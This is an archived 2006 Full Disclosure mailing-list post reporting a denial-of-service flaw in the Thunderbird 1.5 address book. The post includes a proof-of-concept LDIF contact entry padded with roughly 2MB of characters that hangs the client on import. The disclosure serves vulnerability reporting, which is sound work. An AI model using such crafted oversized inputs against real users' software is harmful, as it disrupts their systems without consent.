Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:
edgeos



Full Disclosure: Mozila Thunderbird 1.5 Address Book DoS

Mozila Thunderbird 1.5 Address Book DoS

From: Javor Ninov <javor_at_securax.org>
Date: Fri, 17 Feb 2006 21:50:31 +0200

Affected: Mozila Thunderbird 1.5 /possibly other versions/

Mozila Thunderbird 1.5 address book allows fields of unlimited size in
the address book which leads to a DoS if you import such ldif file

POC: create a file.ldif and insert following then import it in address book:
n: cn=Test POC by DrFrancky_at_securax.org,mail=drfrancky_at_securax.org
objectclass: top
objectclass: person
objectclass: organizationalPerson
objectclass: inetOrgPerson
objectclass: mozillaAbPersonAlpha
givenName: Test
sn: POC by DrFrancky_at_securax.org
cn: POC by DrFrancky_at_securax.org
mozillaNickname: DrFrancky
mail: drfrancky_at_securax.org
nsAIMid: DrFrancky POC
modifytimestamp: 0Z
homePhone: aaaaaaaaaaaaaaa[2MB of 'a']

Credits:
DrFrancky
drfrancky_at_securax.org

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Received on Feb 17 2006
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]